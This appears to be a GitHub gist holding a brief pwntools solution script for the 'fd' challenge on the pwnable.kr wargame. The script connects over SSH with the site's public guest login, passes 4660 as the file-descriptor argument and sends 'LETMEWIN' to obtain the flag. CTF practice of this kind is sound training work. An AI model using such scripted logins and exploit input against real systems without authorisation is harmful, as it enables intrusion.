from pwn import *
sh = ssh(host='pwnable.kr', user='fd', password='guest', port=2222)
proc = sh.process(['/home/fd/fd', '4660'])
proc.sendline('LETMEWIN')
proc.recv(1024)
Last active
March 16, 2017 20:52
-
-
Save parksjin01/bebd50f1296a93e419681c911ec91b77 to your computer and use it in GitHub Desktop.
pwnable.kr fd writeup
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment